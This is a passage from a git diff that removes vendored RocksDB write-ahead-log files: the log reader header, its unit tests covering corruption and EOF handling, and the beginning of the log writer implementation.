-         Reporter* reporter, bool checksum, uint64_t initial_offset,
-         uint64_t log_num);
-
-  ~Reader();
-
-  // Read the next record into *record.  Returns true if read
-  // successfully, false if we hit end of the input.  May use
-  // "*scratch" as temporary storage.  The contents filled in *record
-  // will only be valid until the next mutating operation on this
-  // reader or the next mutation to *scratch.
-  bool ReadRecord(Slice* record, std::string* scratch,
-                  WALRecoveryMode wal_recovery_mode =
-                      WALRecoveryMode::kTolerateCorruptedTailRecords);
-
-  // Returns the physical offset of the last record returned by ReadRecord.
-  //
-  // Undefined before the first call to ReadRecord.
-  uint64_t LastRecordOffset();
-
-  // returns true if the reader has encountered an eof condition.
-  bool IsEOF() {
-    return eof_;
-  }
-
-  // when we know more data has been written to the file. we can use this
-  // function to force the reader to look again in the file.
-  // Also aligns the file position indicator to the start of the next block
-  // by reading the rest of the data from the EOF position to the end of the
-  // block that was partially read.
-  void UnmarkEOF();
-
-  SequentialFileReader* file() { return file_.get(); }
-
- private:
-  std::shared_ptr<Logger> info_log_;
-  const unique_ptr<SequentialFileReader> file_;
-  Reporter* const reporter_;
-  bool const checksum_;
-  char* const backing_store_;
-  Slice buffer_;
-  bool eof_;   // Last Read() indicated EOF by returning < kBlockSize
-  bool read_error_;   // Error occurred while reading from file
-
-  // Offset of the file position indicator within the last block when an
-  // EOF was detected.
-  size_t eof_offset_;
-
-  // Offset of the last record returned by ReadRecord.
-  uint64_t last_record_offset_;
-  // Offset of the first location past the end of buffer_.
-  uint64_t end_of_buffer_offset_;
-
-  // Offset at which to start looking for the first record to return
-  uint64_t const initial_offset_;
-
-  // which log number this is
-  uint64_t const log_number_;
-
-  // Whether this is a recycled log file
-  bool recycled_;
-
-  // Extend record types with the following special values
-  enum {
-    kEof = kMaxRecordType + 1,
-    // Returned whenever we find an invalid physical record.
-    // Currently there are three situations in which this happens:
-    // * The record has an invalid CRC (ReadPhysicalRecord reports a drop)
-    // * The record is a 0-length record (No drop is reported)
-    // * The record is below constructor's initial_offset (No drop is reported)
-    kBadRecord = kMaxRecordType + 2,
-    // Returned when we fail to read a valid header.
-    kBadHeader = kMaxRecordType + 3,
-    // Returned when we read an old record from a previous user of the log.
-    kOldRecord = kMaxRecordType + 4,
-    // Returned when we get a bad record length
-    kBadRecordLen = kMaxRecordType + 5,
-    // Returned when we get a bad record checksum
-    kBadRecordChecksum = kMaxRecordType + 6,
-  };
-
-  // Skips all blocks that are completely before "initial_offset_".
-  //
-  // Returns true on success. Handles reporting.
-  bool SkipToInitialBlock();
-
-  // Return type, or one of the preceding special values
-  unsigned int ReadPhysicalRecord(Slice* result, size_t* drop_size);
-
-  // Read some more
-  bool ReadMore(size_t* drop_size, int *error);
-
-  // Reports dropped bytes to the reporter.
-  // buffer_ must be updated to remove the dropped bytes prior to invocation.
-  void ReportCorruption(size_t bytes, const char* reason);
-  void ReportDrop(size_t bytes, const Status& reason);
-
-  // No copying allowed
-  Reader(const Reader&);
-  void operator=(const Reader&);
-};
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_test.cc b/thirdparty/rocksdb/db/log_test.cc
deleted file mode 100644
index 651a1d0..0000000
--- a/thirdparty/rocksdb/db/log_test.cc
+++ /dev/null
@@ -1,739 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-namespace log {
-
-// Construct a string of the specified length made out of the supplied
-// partial string.
-static std::string BigString(const std::string& partial_string, size_t n) {
-  std::string result;
-  while (result.size() < n) {
-    result.append(partial_string);
-  }
-  result.resize(n);
-  return result;
-}
-
-// Construct a string from a number
-static std::string NumberString(int n) {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "%d.", n);
-  return std::string(buf);
-}
-
-// Return a skewed potentially long string
-static std::string RandomSkewedString(int i, Random* rnd) {
-  return BigString(NumberString(i), rnd->Skewed(17));
-}
-
-class LogTest : public ::testing::TestWithParam<int> {
- private:
-  class StringSource : public SequentialFile {
-   public:
-    Slice& contents_;
-    bool force_error_;
-    size_t force_error_position_;
-    bool force_eof_;
-    size_t force_eof_position_;
-    bool returned_partial_;
-    explicit StringSource(Slice& contents) :
-      contents_(contents),
-      force_error_(false),
-      force_error_position_(0),
-      force_eof_(false),
-      force_eof_position_(0),
-      returned_partial_(false) { }
-
-    virtual Status Read(size_t n, Slice* result, char* scratch) override {
-      EXPECT_TRUE(!returned_partial_) << "must not Read() after eof/error";
-
-      if (force_error_) {
-        if (force_error_position_ >= n) {
-          force_error_position_ -= n;
-        } else {
-          *result = Slice(contents_.data(), force_error_position_);
-          contents_.remove_prefix(force_error_position_);
-          force_error_ = false;
-          returned_partial_ = true;
-          return Status::Corruption("read error");
-        }
-      }
-
-      if (contents_.size() < n) {
-        n = contents_.size();
-        returned_partial_ = true;
-      }
-
-      if (force_eof_) {
-        if (force_eof_position_ >= n) {
-          force_eof_position_ -= n;
-        } else {
-          force_eof_ = false;
-          n = force_eof_position_;
-          returned_partial_ = true;
-        }
-      }
-
-      // By using scratch we ensure that caller has control over the
-      // lifetime of result.data()
-      memcpy(scratch, contents_.data(), n);
-      *result = Slice(scratch, n);
-
-      contents_.remove_prefix(n);
-      return Status::OK();
-    }
-
-    virtual Status Skip(uint64_t n) override {
-      if (n > contents_.size()) {
-        contents_.clear();
-        return Status::NotFound("in-memory file skipepd past end");
-      }
-
-      contents_.remove_prefix(n);
-
-      return Status::OK();
-    }
-  };
-
-  class ReportCollector : public Reader::Reporter {
-   public:
-    size_t dropped_bytes_;
-    std::string message_;
-
-    ReportCollector() : dropped_bytes_(0) { }
-    virtual void Corruption(size_t bytes, const Status& status) override {
-      dropped_bytes_ += bytes;
-      message_.append(status.ToString());
-    }
-  };
-
-  std::string& dest_contents() {
-    auto dest =
-      dynamic_cast<test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    return dest->contents_;
-  }
-
-  const std::string& dest_contents() const {
-    auto dest =
-      dynamic_cast<const test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    return dest->contents_;
-  }
-
-  void reset_source_contents() {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    assert(src);
-    src->contents_ = dest_contents();
-  }
-
-  Slice reader_contents_;
-  unique_ptr<WritableFileWriter> dest_holder_;
-  unique_ptr<SequentialFileReader> source_holder_;
-  ReportCollector report_;
-  Writer writer_;
-  Reader reader_;
-
-  // Record metadata for testing initial offset functionality
-  static size_t initial_offset_record_sizes_[];
-  uint64_t initial_offset_last_record_offsets_[4];
-
- public:
-  LogTest()
-      : reader_contents_(),
-        dest_holder_(test::GetWritableFileWriter(
-            new test::StringSink(&reader_contents_))),
-        source_holder_(
-            test::GetSequentialFileReader(new StringSource(reader_contents_))),
-        writer_(std::move(dest_holder_), 123, GetParam()),
-        reader_(NULL, std::move(source_holder_), &report_, true /*checksum*/,
-                0 /*initial_offset*/, 123) {
-    int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-    initial_offset_last_record_offsets_[0] = 0;
-    initial_offset_last_record_offsets_[1] = header_size + 10000;
-    initial_offset_last_record_offsets_[2] = 2 * (header_size + 10000);
-    initial_offset_last_record_offsets_[3] = 2 * (header_size + 10000) +
-                                             (2 * log::kBlockSize - 1000) +
-                                             3 * header_size;
-  }
-
-  Slice* get_reader_contents() { return &reader_contents_; }
-
-  void Write(const std::string& msg) {
-    writer_.AddRecord(Slice(msg));
-  }
-
-  size_t WrittenBytes() const {
-    return dest_contents().size();
-  }
-
-  std::string Read(const WALRecoveryMode wal_recovery_mode =
-                       WALRecoveryMode::kTolerateCorruptedTailRecords) {
-    std::string scratch;
-    Slice record;
-    if (reader_.ReadRecord(&record, &scratch, wal_recovery_mode)) {
-      return record.ToString();
-    } else {
-      return "EOF";
-    }
-  }
-
-  void IncrementByte(int offset, int delta) {
-    dest_contents()[offset] += delta;
-  }
-
-  void SetByte(int offset, char new_byte) {
-    dest_contents()[offset] = new_byte;
-  }
-
-  void ShrinkSize(int bytes) {
-    auto dest =
-      dynamic_cast<test::StringSink*>(writer_.file()->writable_file());
-    assert(dest);
-    dest->Drop(bytes);
-  }
-
-  void FixChecksum(int header_offset, int len, bool recyclable) {
-    // Compute crc of type/len/data
-    int header_size = recyclable ? kRecyclableHeaderSize : kHeaderSize;
-    uint32_t crc = crc32c::Value(&dest_contents()[header_offset + 6],
-                                 header_size - 6 + len);
-    crc = crc32c::Mask(crc);
-    EncodeFixed32(&dest_contents()[header_offset], crc);
-  }
-
-  void ForceError(size_t position = 0) {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->force_error_ = true;
-    src->force_error_position_ = position;
-  }
-
-  size_t DroppedBytes() const {
-    return report_.dropped_bytes_;
-  }
-
-  std::string ReportMessage() const {
-    return report_.message_;
-  }
-
-  void ForceEOF(size_t position = 0) {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->force_eof_ = true;
-    src->force_eof_position_ = position;
-  }
-
-  void UnmarkEOF() {
-    auto src = dynamic_cast<StringSource*>(reader_.file()->file());
-    src->returned_partial_ = false;
-    reader_.UnmarkEOF();
-  }
-
-  bool IsEOF() {
-    return reader_.IsEOF();
-  }
-
-  // Returns OK iff recorded error message contains "msg"
-  std::string MatchError(const std::string& msg) const {
-    if (report_.message_.find(msg) == std::string::npos) {
-      return report_.message_;
-    } else {
-      return "OK";
-    }
-  }
-
-  void WriteInitialOffsetLog() {
-    for (int i = 0; i < 4; i++) {
-      std::string record(initial_offset_record_sizes_[i],
-                         static_cast<char>('a' + i));
-      Write(record);
-    }
-  }
-
-  void CheckOffsetPastEndReturnsNoRecords(uint64_t offset_past_end) {
-    WriteInitialOffsetLog();
-    unique_ptr<SequentialFileReader> file_reader(
-        test::GetSequentialFileReader(new StringSource(reader_contents_)));
-    unique_ptr<Reader> offset_reader(
-        new Reader(NULL, std::move(file_reader), &report_,
-                   true /*checksum*/, WrittenBytes() + offset_past_end, 123));
-    Slice record;
-    std::string scratch;
-    ASSERT_TRUE(!offset_reader->ReadRecord(&record, &scratch));
-  }
-
-  void CheckInitialOffsetRecord(uint64_t initial_offset,
-                                int expected_record_offset) {
-    WriteInitialOffsetLog();
-    unique_ptr<SequentialFileReader> file_reader(
-        test::GetSequentialFileReader(new StringSource(reader_contents_)));
-    unique_ptr<Reader> offset_reader(
-        new Reader(NULL, std::move(file_reader), &report_,
-                   true /*checksum*/, initial_offset, 123));
-    Slice record;
-    std::string scratch;
-    ASSERT_TRUE(offset_reader->ReadRecord(&record, &scratch));
-    ASSERT_EQ(initial_offset_record_sizes_[expected_record_offset],
-              record.size());
-    ASSERT_EQ(initial_offset_last_record_offsets_[expected_record_offset],
-              offset_reader->LastRecordOffset());
-    ASSERT_EQ((char)('a' + expected_record_offset), record.data()[0]);
-  }
-
-};
-
-size_t LogTest::initial_offset_record_sizes_[] =
-    {10000,  // Two sizable records in first block
-     10000,
-     2 * log::kBlockSize - 1000,  // Span three blocks
-     1};
-
-TEST_P(LogTest, Empty) { ASSERT_EQ("EOF", Read()); }
-
-TEST_P(LogTest, ReadWrite) {
-  Write("foo");
-  Write("bar");
-  Write("");
-  Write("xxxx");
-  ASSERT_EQ("foo", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("xxxx", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("EOF", Read());  // Make sure reads at eof work
-}
-
-TEST_P(LogTest, ManyBlocks) {
-  for (int i = 0; i < 100000; i++) {
-    Write(NumberString(i));
-  }
-  for (int i = 0; i < 100000; i++) {
-    ASSERT_EQ(NumberString(i), Read());
-  }
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, Fragmentation) {
-  Write("small");
-  Write(BigString("medium", 50000));
-  Write(BigString("large", 100000));
-  ASSERT_EQ("small", Read());
-  ASSERT_EQ(BigString("medium", 50000), Read());
-  ASSERT_EQ(BigString("large", 100000), Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, MarginalTrailer) {
-  // Make a trailer that is exactly the same length as an empty record.
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size), WrittenBytes());
-  Write("");
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, MarginalTrailer2) {
-  // Make a trailer that is exactly the same length as an empty record.
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size), WrittenBytes());
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, ShortTrailer) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size + 4;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size + 4), WrittenBytes());
-  Write("");
-  Write("bar");
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, AlignedEof) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int n = kBlockSize - 2 * header_size + 4;
-  Write(BigString("foo", n));
-  ASSERT_EQ((unsigned int)(kBlockSize - header_size + 4), WrittenBytes());
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, RandomRead) {
-  const int N = 500;
-  Random write_rnd(301);
-  for (int i = 0; i < N; i++) {
-    Write(RandomSkewedString(i, &write_rnd));
-  }
-  Random read_rnd(301);
-  for (int i = 0; i < N; i++) {
-    ASSERT_EQ(RandomSkewedString(i, &read_rnd), Read());
-  }
-  ASSERT_EQ("EOF", Read());
-}
-
-// Tests of all the error paths in log_reader.cc follow:
-
-TEST_P(LogTest, ReadError) {
-  Write("foo");
-  ForceError();
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ((unsigned int)kBlockSize, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("read error"));
-}
-
-TEST_P(LogTest, BadRecordType) {
-  Write("foo");
-  // Type is stored in header[6]
-  IncrementByte(6, 100);
-  FixChecksum(0, 3, false);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("unknown record type"));
-}
-
-TEST_P(LogTest, TruncatedTrailingRecordIsIgnored) {
-  Write("foo");
-  ShrinkSize(4);   // Drop all payload as well as a header byte
-  ASSERT_EQ("EOF", Read());
-  // Truncated last record is ignored, not treated as an error
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, TruncatedTrailingRecordIsNotIgnored) {
-  Write("foo");
-  ShrinkSize(4);  // Drop all payload as well as a header byte
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  // Truncated last record is ignored, not treated as an error
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: truncated header"));
-}
-
-TEST_P(LogTest, BadLength) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  const int kPayloadSize = kBlockSize - header_size;
-  Write(BigString("bar", kPayloadSize));
-  Write("foo");
-  // Least significant size byte is stored in header[4].
-  IncrementByte(4, 1);
-  if (!GetParam()) {
-    ASSERT_EQ("foo", Read());
-    ASSERT_EQ(kBlockSize, DroppedBytes());
-    ASSERT_EQ("OK", MatchError("bad record length"));
-  } else {
-    ASSERT_EQ("EOF", Read());
-  }
-}
-
-TEST_P(LogTest, BadLengthAtEndIsIgnored) {
-  Write("foo");
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(0U, DroppedBytes());
-  ASSERT_EQ("", ReportMessage());
-}
-
-TEST_P(LogTest, BadLengthAtEndIsNotIgnored) {
-  Write("foo");
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: truncated header"));
-}
-
-TEST_P(LogTest, ChecksumMismatch) {
-  Write("foooooo");
-  IncrementByte(0, 14);
-  ASSERT_EQ("EOF", Read());
-  if (!GetParam()) {
-    ASSERT_EQ(14U, DroppedBytes());
-    ASSERT_EQ("OK", MatchError("checksum mismatch"));
-  } else {
-    ASSERT_EQ(0U, DroppedBytes());
-    ASSERT_EQ("", ReportMessage());
-  }
-}
-
-TEST_P(LogTest, UnexpectedMiddleType) {
-  Write("foo");
-  SetByte(6, GetParam() ? kRecyclableMiddleType : kMiddleType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("missing start"));
-}
-
-TEST_P(LogTest, UnexpectedLastType) {
-  Write("foo");
-  SetByte(6, GetParam() ? kRecyclableLastType : kLastType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("missing start"));
-}
-
-TEST_P(LogTest, UnexpectedFullType) {
-  Write("foo");
-  Write("bar");
-  SetByte(6, GetParam() ? kRecyclableFirstType : kFirstType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("partial record without end"));
-}
-
-TEST_P(LogTest, UnexpectedFirstType) {
-  Write("foo");
-  Write(BigString("bar", 100000));
-  SetByte(6, GetParam() ? kRecyclableFirstType : kFirstType);
-  FixChecksum(0, 3, !!GetParam());
-  ASSERT_EQ(BigString("bar", 100000), Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("partial record without end"));
-}
-
-TEST_P(LogTest, MissingLastIsIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Remove the LAST block, including header.
-  ShrinkSize(14);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("", ReportMessage());
-  ASSERT_EQ(0U, DroppedBytes());
-}
-
-TEST_P(LogTest, MissingLastIsNotIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Remove the LAST block, including header.
-  ShrinkSize(14);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError("Corruption: error reading trailing data"));
-}
-
-TEST_P(LogTest, PartialLastIsIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Cause a bad record length in the LAST block.
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ("", ReportMessage());
-  ASSERT_EQ(0U, DroppedBytes());
-}
-
-TEST_P(LogTest, PartialLastIsNotIgnored) {
-  Write(BigString("bar", kBlockSize));
-  // Cause a bad record length in the LAST block.
-  ShrinkSize(1);
-  ASSERT_EQ("EOF", Read(WALRecoveryMode::kAbsoluteConsistency));
-  ASSERT_GT(DroppedBytes(), 0U);
-  ASSERT_EQ("OK", MatchError(
-                      "Corruption: truncated headerCorruption: "
-                      "error reading trailing data"));
-}
-
-TEST_P(LogTest, ErrorJoinsRecords) {
-  // Consider two fragmented records:
-  //    first(R1) last(R1) first(R2) last(R2)
-  // where the middle two fragments disappear.  We do not want
-  // first(R1),last(R2) to get joined and returned as a valid record.
-
-  // Write records that span two blocks
-  Write(BigString("foo", kBlockSize));
-  Write(BigString("bar", kBlockSize));
-  Write("correct");
-
-  // Wipe the middle block
-  for (unsigned int offset = kBlockSize; offset < 2*kBlockSize; offset++) {
-    SetByte(offset, 'x');
-  }
-
-  if (!GetParam()) {
-    ASSERT_EQ("correct", Read());
-    ASSERT_EQ("EOF", Read());
-    size_t dropped = DroppedBytes();
-    ASSERT_LE(dropped, 2 * kBlockSize + 100);
-    ASSERT_GE(dropped, 2 * kBlockSize);
-  } else {
-    ASSERT_EQ("EOF", Read());
-  }
-}
-
-TEST_P(LogTest, ReadStart) { CheckInitialOffsetRecord(0, 0); }
-
-TEST_P(LogTest, ReadSecondOneOff) { CheckInitialOffsetRecord(1, 1); }
-
-TEST_P(LogTest, ReadSecondTenThousand) { CheckInitialOffsetRecord(10000, 1); }
-
-TEST_P(LogTest, ReadSecondStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(10000 + header_size, 1);
-}
-
-TEST_P(LogTest, ReadThirdOneOff) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(10000 + header_size + 1, 2);
-}
-
-TEST_P(LogTest, ReadThirdStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(20000 + 2 * header_size, 2);
-}
-
-TEST_P(LogTest, ReadFourthOneOff) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(20000 + 2 * header_size + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthFirstBlockTrailer) {
-  CheckInitialOffsetRecord(log::kBlockSize - 4, 3);
-}
-
-TEST_P(LogTest, ReadFourthMiddleBlock) {
-  CheckInitialOffsetRecord(log::kBlockSize + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthLastBlock) {
-  CheckInitialOffsetRecord(2 * log::kBlockSize + 1, 3);
-}
-
-TEST_P(LogTest, ReadFourthStart) {
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  CheckInitialOffsetRecord(
-      2 * (header_size + 1000) + (2 * log::kBlockSize - 1000) + 3 * header_size,
-      3);
-}
-
-TEST_P(LogTest, ReadEnd) { CheckOffsetPastEndReturnsNoRecords(0); }
-
-TEST_P(LogTest, ReadPastEnd) { CheckOffsetPastEndReturnsNoRecords(5); }
-
-TEST_P(LogTest, ClearEofSingleBlock) {
-  Write("foo");
-  Write("bar");
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  ForceEOF(3 + header_size + 2);
-  ASSERT_EQ("foo", Read());
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_TRUE(IsEOF());
-  ASSERT_EQ("EOF", Read());
-  Write("xxx");
-  UnmarkEOF();
-  ASSERT_EQ("xxx", Read());
-  ASSERT_TRUE(IsEOF());
-}
-
-TEST_P(LogTest, ClearEofMultiBlock) {
-  size_t num_full_blocks = 5;
-  int header_size = GetParam() ? kRecyclableHeaderSize : kHeaderSize;
-  size_t n = (kBlockSize - header_size) * num_full_blocks + 25;
-  Write(BigString("foo", n));
-  Write(BigString("bar", n));
-  ForceEOF(n + num_full_blocks * header_size + header_size + 3);
-  ASSERT_EQ(BigString("foo", n), Read());
-  ASSERT_TRUE(IsEOF());
-  UnmarkEOF();
-  ASSERT_EQ(BigString("bar", n), Read());
-  ASSERT_TRUE(IsEOF());
-  Write(BigString("xxx", n));
-  UnmarkEOF();
-  ASSERT_EQ(BigString("xxx", n), Read());
-  ASSERT_TRUE(IsEOF());
-}
-
-TEST_P(LogTest, ClearEofError) {
-  // If an error occurs during Read() in UnmarkEOF(), the records contained
-  // in the buffer should be returned on subsequent calls of ReadRecord()
-  // until no more full records are left, whereafter ReadRecord() should return
-  // false to indicate that it cannot read any further.
-
-  Write("foo");
-  Write("bar");
-  UnmarkEOF();
-  ASSERT_EQ("foo", Read());
-  ASSERT_TRUE(IsEOF());
-  Write("xxx");
-  ForceError(0);
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-TEST_P(LogTest, ClearEofError2) {
-  Write("foo");
-  Write("bar");
-  UnmarkEOF();
-  ASSERT_EQ("foo", Read());
-  Write("xxx");
-  ForceError(3);
-  UnmarkEOF();
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-  ASSERT_EQ(3U, DroppedBytes());
-  ASSERT_EQ("OK", MatchError("read error"));
-}
-
-TEST_P(LogTest, Recycle) {
-  if (!GetParam()) {
-    return;  // test is only valid for recycled logs
-  }
-  Write("foo");
-  Write("bar");
-  Write("baz");
-  Write("bif");
-  Write("blitz");
-  while (get_reader_contents()->size() < log::kBlockSize * 2) {
-    Write("xxxxxxxxxxxxxxxx");
-  }
-  unique_ptr<WritableFileWriter> dest_holder(test::GetWritableFileWriter(
-      new test::OverwritingStringSink(get_reader_contents())));
-  Writer recycle_writer(std::move(dest_holder), 123, true);
-  recycle_writer.AddRecord(Slice("foooo"));
-  recycle_writer.AddRecord(Slice("bar"));
-  ASSERT_GE(get_reader_contents()->size(), log::kBlockSize * 2);
-  ASSERT_EQ("foooo", Read());
-  ASSERT_EQ("bar", Read());
-  ASSERT_EQ("EOF", Read());
-}
-
-INSTANTIATE_TEST_CASE_P(bool, LogTest, ::testing::Values(0, 2));
-
-}  // namespace log
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/log_writer.cc b/thirdparty/rocksdb/db/log_writer.cc
deleted file mode 100644
index b02eec8..0000000
--- a/thirdparty/rocksdb/db/log_writer.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_writer.h"
-
-#include <stdint.h>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace log {
-
-Writer::Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-               bool recycle_log_files, bool manual_flush)
-    : dest_(std::move(dest)),
-      block_offset_(0),
-      log_number_(log_number),
-      recycle_log_files_(recycle_log_files),
-      manual_flush_(manual_flush) {
-  for (int i = 0; i <= kMaxRecordType; i++) {
-    char t = static_cast<char>(i);
-    type_crc_[i] = crc32c::Value(&t, 1);
-  }
-}
-
-Writer::~Writer() { WriteBuffer(); }
-
-Status Writer::WriteBuffer() { return dest_->Flush(); }
-
-Status Writer::AddRecord(const Slice& slice) {
-  const char* ptr = slice.data();
-  size_t left = slice.size();
-
-  // Header size varies depending on whether we are recycling or not.
-  const int header_size =
-      recycle_log_files_ ? kRecyclableHeaderSize : kHeaderSize;
-
-  // Fragment the record if necessary and emit it.  Note that if slice
-  // is empty, we still want to iterate once to emit a single
-  // zero-length record
-  Status s;
-  bool begin = true;
-  do {
-    const int64_t leftover = kBlockSize - block_offset_;
-    assert(leftover >= 0);
-    if (leftover < header_size) {
-      // Switch to a new block
-      if (leftover > 0) {
-        // Fill the trailer (literal below relies on kHeaderSize and
-        // kRecyclableHeaderSize being <= 11)
-        assert(header_size <= 11);
-        dest_->Append(
-            Slice("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", leftover));
-      }
-      block_offset_ = 0;
-    }
-
-    // Invariant: we never leave < header_size bytes in a block.
-    assert(static_cast<int64_t>(kBlockSize - block_offset_) >= header_size);
-
-    const size_t avail = kBlockSize - block_offset_ - header_size;
-    const size_t fragment_length = (left < avail) ? left : avail;
-
-    RecordType type;
-    const bool end = (left == fragment_length);
-    if (begin && end) {
-      type = recycle_log_files_ ? kRecyclableFullType : kFullType;
-    } else if (begin) {
-      type = recycle_log_files_ ? kRecyclableFirstType : kFirstType;
-    } else if (end) {
-      type = recycle_log_files_ ? kRecyclableLastType : kLastType;
-    } else {
-      type = recycle_log_files_ ? kRecyclableMiddleType : kMiddleType;
-    }
-
-    s = EmitPhysicalRecord(type, ptr, fragment_length);
-    ptr += fragment_length;
-    left -= fragment_length;
-    begin = false;
-  } while (s.ok() && left > 0);
-  return s;
-}
-
-Status Writer::EmitPhysicalRecord(RecordType t, const char* ptr, size_t n) {
-  assert(n <= 0xffff);  // Must fit in two bytes
-
-  size_t header_size;
-  char buf[kRecyclableHeaderSize];
-
-  // Format the header
-  buf[4] = static_cast<char>(n & 0xff);
-  buf[5] = static_cast<char>(n >> 8);
-  buf[6] = static_cast<char>(t);
-
-  uint32_t crc = type_crc_[t];
